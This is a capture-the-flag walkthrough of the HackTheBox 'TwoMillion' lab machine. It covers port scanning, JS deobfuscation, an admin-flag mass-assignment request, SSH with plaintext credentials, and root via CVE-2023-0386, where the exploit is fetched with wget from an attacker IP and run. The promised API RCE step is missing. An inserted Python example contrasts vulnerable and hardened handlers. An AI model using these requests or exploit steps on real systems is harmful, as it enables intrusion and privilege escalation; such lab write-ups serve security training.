[Meachines] [Easy] TwoMillion: JS Deobfuscation + API RCE + OverlayFS Privilege Escalation
Word count: 1380 | 2025-08-22 12:23:41
TwoMillion Machine: Complete Penetration Testing Walkthrough
1. Information Gathering
1.1 Initial Scan
$ sudo masscan -p1-65535,U:1-65535 10.10.11.221 --rate=1000 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.221
Scan results:
- 22/tcp: OpenSSH 8.9p1 Ubuntu 3ubuntu0.1
- 80/tcp: nginx (redirects to http://2million.htb/)
1.2 Add the Hostname to the hosts File
$ echo '10.10.11.221 2million.htb' >> /etc/hosts
2. Web Application Analysis
2.1 Directory Scan
$ dirsearch -u http://2million.htb
2.2 JS Deobfuscation
Obfuscated JavaScript was found at view-source:http://2million.htb/js/inviteapi.min.js
Key functions after deobfuscation:
function verifyInviteCode(code) {
    var formData = {"code": code};
    $.ajax({
        type: "POST",
        dataType: "json",
        data: formData,
        url: '/api/v1/invite/verify',
        success: function(response) { console.log(response); },
        error: function(response) { console.log(response); }
    });
}

function makeInviteCode() {
    $.ajax({
        type: "POST",
        dataType: "json",
        url: '/api/v1/invite/generate',
        success: function(response) { console.log(response); },
        error: function(response) { console.log(response); }
    });
}
2.3 Decoding the ROT13 Hint
$ echo 'Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Output: To generate the invite code, make a POST request to /api/v1/invite/generate
3. API Exploitation
3.1 API Endpoint List
User API:
- GET /api/v1 - route list
- GET /api/v1/invite/how/to/generate - instructions for generating an invite code
- GET /api/v1/invite/generate - generate an invite code
- GET /api/v1/invite/verify - verify an invite code
- GET /api/v1/user/auth - check whether the user is authenticated
- GET /api/v1/user/vpn/generate - generate a new VPN configuration
- GET /api/v1/user/vpn/regenerate - regenerate the VPN configuration
- GET /api/v1/user/vpn/download - download the OVPN file
- POST /api/v1/user/register - register a new user
- POST /api/v1/user/login - log in an existing user
Admin API:
- GET /api/v1/admin/auth - check whether the user is an administrator
- POST /api/v1/admin/vpn/generate - generate a VPN configuration for a specific user
- PUT /api/v1/admin/settings/update - update user settings
3.2 Generating an Invite Code
POST /api/v1/invite/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Example response: DATV8-W1GS1-U5MY1-E43OY
3.3 Escalating Privileges to Administrator
PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 47
{"email":"maptnh@gmail.com","is_admin":1}
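The request above works because the settings endpoint only checks for a valid session and then copies every JSON field onto the named account. The following is an added example, not code from the original write-up or from the machine's backend (which the page does not show): a minimal model of the PUT /api/v1/admin/settings/update handler with the weak behaviour beside a hardened version. The endpoint and the is_admin field are the page's; the user store, session identifiers and function names are constructed for illustration.

```python
"""Added example (not from the write-up): weak vs. hardened model of the
PUT /api/v1/admin/settings/update handler. Users, sessions and function
names are constructed; only the endpoint and the is_admin field come from
the page."""
import re

# Constructed in-memory user table, keyed by the email bound to a session.
USERS = {
    "user@example.com": {"email": "user@example.com", "is_admin": 0},
    "admin@example.com": {"email": "admin@example.com", "is_admin": 1},
}

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
# Fields this endpoint may change, each with a validator for its value.
ALLOWED_FIELDS = {"is_admin": lambda v: type(v) is int and v in (0, 1)}


def update_settings_weak(session_user, payload):
    """Models the flaw: any logged-in session is accepted, and every JSON key
    is copied onto the named account, so a normal user can set is_admin on
    their own record. Returns (http_status, body)."""
    target = USERS[payload["email"]]
    for key, value in payload.items():
        target[key] = value
    return 200, target


def update_settings_hardened(session_user, payload):
    """Enforce the admin role the /admin/ path implies, then apply only
    allow-listed, validated fields to a validated target."""
    caller = USERS.get(session_user)
    if caller is None or caller["is_admin"] != 1:
        return 403, {"error": "admin role required"}
    target_email = payload.get("email")
    if not isinstance(target_email, str) or not EMAIL_RE.match(target_email):
        return 400, {"error": "invalid email"}
    changes = {k: v for k, v in payload.items() if k != "email"}
    unknown = set(changes) - set(ALLOWED_FIELDS)
    if unknown:
        return 400, {"error": f"unknown field(s): {sorted(unknown)}"}
    for key, value in changes.items():
        if not ALLOWED_FIELDS[key](value):
            return 400, {"error": f"bad value for {key}"}
    target = USERS.get(target_email)
    if target is None:
        return 404, {"error": "no such user"}
    target.update(changes)
    return 200, target
```

The hardened handler also rejects unknown keys outright rather than ignoring them, so a client cannot probe for accidentally writable columns.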
3.4 Generating a VPN Configuration
POST /api/v1/admin/vpn/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 35
{"username":"maptnh@gmail.com"}
4. SSH Access
Log in with the obtained credentials:
$ ssh admin@10.10.11.221
username: admin
password: SuperDuperPass123
Get the user flag:
6a9c99994e4334df9edc1fc13bca997b
5. Privilege Escalation: Exploiting the OverlayFS Vulnerability
5.1 Finding the Vulnerability Hint
Mail found in /var/spool/mail/admin:
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Hey admin,
I know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.
5.2 Exploiting CVE-2023-0386
- Download the exploit code:
$ git clone https://github.com/puckiestyle/CVE-2023-0386.git
$ tar -czvf CVE-2023-0386.tar.gz ./CVE-2023-0386
- On the target machine:
admin@2million:/tmp$ wget http://10.10.16.16/CVE-2023-0386.tar.gz
admin@2million:/tmp$ tar -zxvf CVE-2023-0386.tar.gz
admin@2million:/tmp/CVE-2023-0386$ make all
admin@2million:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc
admin@2million:/tmp/CVE-2023-0386$ ./exp
- Get the root flag:
35ed55b48c40b4a093970f40eda0281c
6. Summary of Key Takeaways
- Information gathering: port scanning with masscan and nmap to identify open services
- JS deobfuscation: analyzing obfuscated JavaScript to discover API endpoints
- API abuse:
  - Discovering the API endpoint via ROT13 decoding
  - Using the PUT method to modify user privileges
  - Abusing the admin API to generate a VPN configuration
- Privilege escalation:
  - Identifying the unpatched OverlayFS vulnerability (CVE-2023-0386)
  - Compiling and running the local privilege escalation exploit
7. Defensive Recommendations
- Keep the operating system kernel up to date and patch known vulnerabilities promptly
- Enforce strict API authorization so ordinary users cannot escalate their own privileges
- Require multi-factor authentication for sensitive operations
- Avoid exposing API documentation or hints in front-end code
- Implement input validation and output encoding to prevent injection attacks